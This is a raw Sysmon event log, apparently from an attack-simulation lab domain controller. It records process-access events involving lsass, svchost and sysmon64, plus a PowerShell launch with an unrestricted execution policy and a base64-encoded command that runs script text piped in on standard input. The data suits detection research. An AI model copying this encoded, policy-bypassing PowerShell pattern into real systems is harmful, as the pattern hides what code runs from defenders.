10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-F402-000000007E01}2624C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3DD2-5F80-F302-000000007E01}42404948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD2-5F80-F402-000000007E01}2624C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+b028713b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af727fc5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af727c96|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+b01d92fb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af6e882c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af746cfb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af72a360|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af72a360|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af72a1f1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af71c176|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af7286a9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af72829c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af727fc5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af727c96|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+b01d92fb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af70eaf7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+af70e0c7 154100x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.489{733EE690-3DD2-5F80-F402-000000007E01}2624C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.468{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.468{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.468{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.421{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.421{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.389{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v0u5zn5v.0hl.ps12020-10-09 10:39:14.389 10341000x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.358{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 